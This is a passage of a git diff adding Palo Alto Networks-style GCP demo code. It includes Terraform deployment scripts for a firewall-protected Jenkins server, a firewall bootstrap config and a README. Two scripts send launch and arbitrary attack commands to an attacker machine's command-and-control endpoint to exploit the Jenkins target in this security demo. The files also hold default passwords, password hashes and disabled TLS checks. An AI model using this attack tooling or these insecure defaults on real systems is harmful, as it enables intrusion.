Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP Install Complete ") + completed = 1 + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' + type = "op" + cmd = "" + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.info("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + +def getApiKey(hostname, username, password): + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. 
Wait 10 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.info("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + """ + For tracking purposes. Write responses to file. 
+ :param key: + :param value: + :return: + """ + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 18 + while True: + if count < max_count: + time.sleep(10) + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def apply_tf(working_dir, vars, description): + + """ + Handles terraform operations and returns variables in outputs.tf as a dict. + :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + + +def main(username, password, GCP_region, Billing_Account ): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + # TODO maybe use a zone lookup but for now use region-B + GCP_Zone = GCP_region + '-b' + + + + + + WebInDeploy_vars = { + 'GCP_Zone': GCP_Zone, + 'GCP_Region': GCP_region, + 'Billing_Account': Billing_Account, + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set 
run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + # Build Infrastructure + # + # + + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) + + + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + nlbDns = web_in_deploy_output['NATIVE-DNS']['value'] + fwMgtIP = web_in_deploy_output['FW_Mgmt_IP']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Firewall Mgt address is {}".format(fwMgtIP)) + + else: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + # + # Check firewall is up and running + # + # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + + + logger.info("Updating firewall with latest content pack") + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + + logger.info("Applying addtional config to firewall") + + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') + logger.debug('Got return code {}'.format(return_code)) + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf succeeded") + + else: + logger.info("WebInFWConf failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-a', '--GCP_Region', help='GCP Region', required=True) + # parser.add_argument('-r', '--GCP_Zone', help='GCP Zone', required=True) + parser.add_argument('-m', '--Billing_Account', help='Billing Account', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + # GCP_Zone = 
args.GCP_Zone + GCP_Region = args.GCP_Region + Billing_Account = args.Billing_Account + + main(username, password, GCP_Region, Billing_Account) diff --git a/gcp/Jenkins_proj-master/destroy.py b/gcp/Jenkins_proj-master/destroy.py new file mode 100644 index 00000000..a314e0d1 --- /dev/null +++ b/gcp/Jenkins_proj-master/destroy.py @@ -0,0 +1,101 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage: +git +python destroy.py + +""" + +import argparse +import logging + +from python_terraform import Terraform + +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +def main(username, password): + username = username + password = password + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInBootstrap_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + albDns = '' + nlbDns = '' + fwMgt = '' + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + deployment_status = {} + kwargs = {"auto-approve": True} + + # + # Destroy Infrastructure + # + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + + attack_rg_name = tf.output('Attacker_RG_Name') + logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) + + WebInDeploy_vars.update({'RG_Name': rg_name}) + WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("Failed to destroy build ") + + exit() + else: + + logger.info("Destroyed WebInDeploy ") + + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + + main(username, password) diff --git a/gcp/Jenkins_proj-master/gcp_login.py b/gcp/Jenkins_proj-master/gcp_login.py new file mode 100644 index 00000000..ecec1f80 --- /dev/null +++ b/gcp/Jenkins_proj-master/gcp_login.py @@ -0,0 +1,23 @@ +import os +""" +gloud_login +Runs the shell command to invoke login. +The login process creates a new browser window for interactive login. 
+The login process updates the gloud auth files in ~/.config/gcloud +Files updated are: + access_tokens.db + config_sentinel + credentials.db + +The login process stores credentials in sqlite3 in ~/.config/gcloud/credentials.db + +https://www.jhanley.com/google-cloud-where-are-my-credentials-stored/ + +""" + +def gcloud_login(): + cmd = 'gcloud auth login' + os.system(cmd) + +if __name__ == '__main__': + gcloud_login() diff --git a/gcp/Jenkins_proj-master/launch_attack_vector.py b/gcp/Jenkins_proj-master/launch_attack_vector.py new file mode 100644 index 00000000..dce17b39 --- /dev/null +++ b/gcp/Jenkins_proj-master/launch_attack_vector.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform +import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + print('Could not parse terraform outputs!') + return dict() + + +def main(attack_vector: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + print(outputs) + if attack_vector == 'native': + print('Using native waf protected attack vector...\n') + target = outputs['NATIVE-DNS']['value'] + elif attack_vector == 'panos': + print('Using PAN-OS protected attack vector...\n') + target = outputs['ALB-DNS']['value'] + else: + print('malformed outputs!') + target = '127.0.0.1' + if 'ATTACKER_IP' not in outputs: + print('No attacker ip found in tf outputs!') + sys.exit(1) + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['attacker'] = attacker + payload['target'] = target + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Exploit Successfully Launched!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Launch Exploit!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC') + parser.add_argument('-c', '--vector', help='Attack Vector', required=True) + + args = parser.parse_args() + vector = args.vector + + main(vector) + diff --git a/gcp/Jenkins_proj-master/requirements.txt b/gcp/Jenkins_proj-master/requirements.txt new file mode 100644 index 00000000..ad92f262 --- /dev/null +++ b/gcp/Jenkins_proj-master/requirements.txt @@ -0,0 +1,12 @@ +google-api-core==1.11.1 +google-auth==1.6.3 +google-cloud-core==1.0.1 +google-cloud-storage==1.16.1 +google-resumable-media==0.3.2 +googleapis-common-protos==1.6.0 +pan-python==0.14.0 +pandevice==0.11.0 +python-terraform==0.10.0 +requests==2.21.0 +urllib3==1.24.2 +xmltodict==0.12.0 diff --git a/gcp/Jenkins_proj-master/send_command.py b/gcp/Jenkins_proj-master/send_command.py new file mode 100644 index 00000000..cbccbdfb --- /dev/null +++ b/gcp/Jenkins_proj-master/send_command.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform +import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + 
print('Could not parse terraform outputs!') + return dict() + + +def main(cli: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['cli'] = cli + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Command Successfully Executed!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Execute Command!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Send Jenkins Attack Command') + parser.add_argument('-c', '--cli', help='Attack Command', required=True) + parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False) + + args = parser.parse_args() + cli = args.cli + mcli = args.manual_cli + + if mcli is not None and mcli != '': + main(mcli) + else: + main(cli) + diff --git a/gcp/adv-peering-with-lbnh/README.md b/gcp/adv-peering-with-lbnh/README.md new file mode 100644 index 00000000..f2a711cb --- /dev/null +++ b/gcp/adv-peering-with-lbnh/README.md @@ -0,0 +1,73 @@ +## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering and Load Balancer as Next Hop +Terraform creates 4 VM-Series firewalls that secure ingress/egress/east-west traffic for 2 spoke VPCs. The spoke VPCs are connected (via VPC Peering and Load Balancer as Next Hop) to the VM-Series. After the build completes, several manual changes must be performed to enable transitive routing. The manual changes are required since they cannot be performed through Terraform, yet. + +### Overview +* 8 x VPCs (ilb-mgmt,ilb-untust,ilb-trust,mgmt, untrust, trust, spoke1, & spoke2) with relevant peering connections +* 4 x VM-Series (BYOL / Bundle1 / Bundle2) +* 2 x Ubuntu VM in spoke1 VPC (install Apache during creation) +* 1 x Ubuntu VM in spoke2 VPC +* 1 x GCP Public Load Balancer (VM-Series as backend) +* 1 x GCP Internal Load Balancer (spoke1 VM's as backend) +* 1 x GCP Internal Load Balancer (VM-Series firewall 3 & 4 as backend) +* 2 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness) +
+

+ +

+
+
+### Prerequisites
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+ * **Username:** paloalto
+ * **Password:** Pal0Alt0@123
+
+### Deployment
+1. Download the **adv-peering-with-lbnh** repo to the machine running the build
+2. In an editor, open **variables.tf** and set values for the following variables
+
+| Variable | Description |
+| :------------- | :------------- |
+| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `main_project_auth_file` | Authentication key file for main_project |
+| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer |
+| `spoke1_project_auth_file` | Authentication key file for spoke1_project |
+| `spoke2_project` | Project ID for spoke2 VM & VPC |
+| `spoke2_project_auth_file` | Authentication key file for spoke2_project |
+| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) |
+| `vmseries_image` | Uncomment the VM-Series license you want to deploy |
+
+3. Download the project authentication key files to the main directory of the Terraform build.
+
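Before running Terraform it is worth confirming that each key file from step 3 actually parses. A minimal sketch using the google-auth library (the same package the Jenkins_proj requirements.txt pins); the three file names are placeholders for whatever paths you set in variables.tf:

```python
# check_keys.py -- sketch: confirm each downloaded service-account key file
# parses and report which project it belongs to. File names are placeholders.
import json
from google.oauth2 import service_account

KEY_FILES = ["main-project.json", "spoke1-project.json", "spoke2-project.json"]

for path in KEY_FILES:
    # from_service_account_file() raises if the JSON is malformed or incomplete
    creds = service_account.Credentials.from_service_account_file(path)
    with open(path) as f:
        project_id = json.load(f).get("project_id", "<unknown>")
    print("{}: OK ({}, project {})".format(path, creds.service_account_email, project_id))
```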

+ +

+
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes**
+
+
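Step 4 can also be driven from Python with python-terraform, the same way apply_tf() works in the Jenkins_proj deploy.py shown earlier. A minimal sketch, assuming it is run from the adv-peering-with-lbnh directory:

```python
# apply_sketch.py -- sketch: the init/plan/apply sequence from step 4 driven by
# python-terraform, mirroring apply_tf() in the Jenkins_proj deploy.py.
from python_terraform import Terraform

tf = Terraform(working_dir='.')              # assumes the adv-peering-with-lbnh root
tf.cmd('init')
tf.plan(capture_output=False)                # optional review, like `terraform plan`
return_code, stdout, stderr = tf.apply(capture_output=False, skip_plan=True,
                                       **{"auto-approve": True})
print('terraform apply returned {}'.format(return_code))
```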

+ +

+
+
+6. Remove default GCP VPC route for spoke1-vpc, spoke2-vpc, & trust-vpc
+
+
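If you would rather locate the routes for step 6 from a script than hunt for them in the console, a hedged sketch that shells out to gcloud follows; the project IDs, VPC names, and filter expression are assumptions and may need adjusting for your environment:

```python
# list_default_routes.py -- sketch: list the 0.0.0.0/0 routes that step 6 asks
# you to remove, so they can be reviewed before deletion in the console.
# Project IDs, VPC names and the filter syntax are placeholders/assumptions.
import subprocess

VPCS = [("my-main-project", "trust-vpc"),
        ("my-spoke1-project", "spoke1-vpc"),
        ("my-spoke2-project", "spoke2-vpc")]

for project, vpc in VPCS:
    cmd = ["gcloud", "compute", "routes", "list",
           "--project", project,
           "--filter", "network:{} AND destRange=0.0.0.0/0".format(vpc),
           "--format", "value(name)"]
    result = subprocess.run(cmd, capture_output=True, text=True)
    for name in result.stdout.split():
        print("candidate default route in {}: {}".format(project, name))
```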

+ +

+
+
+7. From the Terraform output, browse to the `GLB-ADDRESS = http://` value in a web browser. NOTE: IT MAY TAKE SEVERAL MINUTES FOR THE SPOKE1 VMs TO FINISH THE APACHE & PHP SETUP.
+
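Instead of refreshing the browser while the spoke1 VMs finish their Apache/PHP install, the address can be polled, much like getServerStatus() does in the Jenkins_proj deploy.py. A sketch, with the URL left as a placeholder for your GLB-ADDRESS output:

```python
# wait_for_glb.py -- sketch: poll the public load balancer until it answers
# HTTP 200, similar to getServerStatus() in deploy.py. URL is a placeholder.
import time
import requests

GLB_ADDRESS = "http://<GLB-ADDRESS from terraform output>"

for attempt in range(30):                    # roughly five minutes of retries
    try:
        if requests.get(GLB_ADDRESS, timeout=5).status_code == 200:
            print("Spoke1 web service is up at {}".format(GLB_ADDRESS))
            break
    except requests.exceptions.RequestException:
        pass                                 # backends still installing Apache/PHP
    time.sleep(10)
else:
    print("Gave up waiting for {}".format(GLB_ADDRESS))
```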

+ +

+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes b/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml b/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..c9d7adda --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml @@ -0,0 +1,1068 @@ + + + + + + + + yes + + + $1$omtpasik$JVuMCKVuxaIHBIkdrbR4k. + + + + + yes + + + $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ. + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + yes + + + + + no + + + + + no + + + yes + + 1460 + + no + + + + + + + no + + + + + no + + + + + no + + + yes + + 1460 + + no + + mgmt-profile + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.2.0/24 + + + + + + + + + + + + 
+ updates.paloaltonetworks.com + + + + + download-and-install + 15 + + + + + + + download-and-install + 30 + + + + + US/Pacific + + yes + yes + + vm-series + + + 208.67.222.222 + 208.67.220.220 + + + + + yes + no + yes + no + + + yes + + no + + THIS IS A DEMO DEPLOYMENT +DO NOT USE FOR PRODUCTION + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 22 + + + + + + + 221 + + + + + + + 222 + + + + + + + 223 + + + + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + ping + + + any + + + any + + yes + yes + allow + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + any + + + service-http + service-https + + + any + + yes + yes + allow + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + any + + + any + + yes + yes + allow + no + If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + yes + yes + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + yes + yes + allow + + + + + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + service-http + ipv4 + no + + spoke1-intlb + 80 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + service-tcp-221 + ipv4 + + spoke1-vm1 + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + service-tcp-222 + ipv4 + + spoke1-vm2 + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + tcp-223 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + trust-zone + + + trust-zone + + + any + + + any + + any + ipv4 + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + ipv4 + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + +
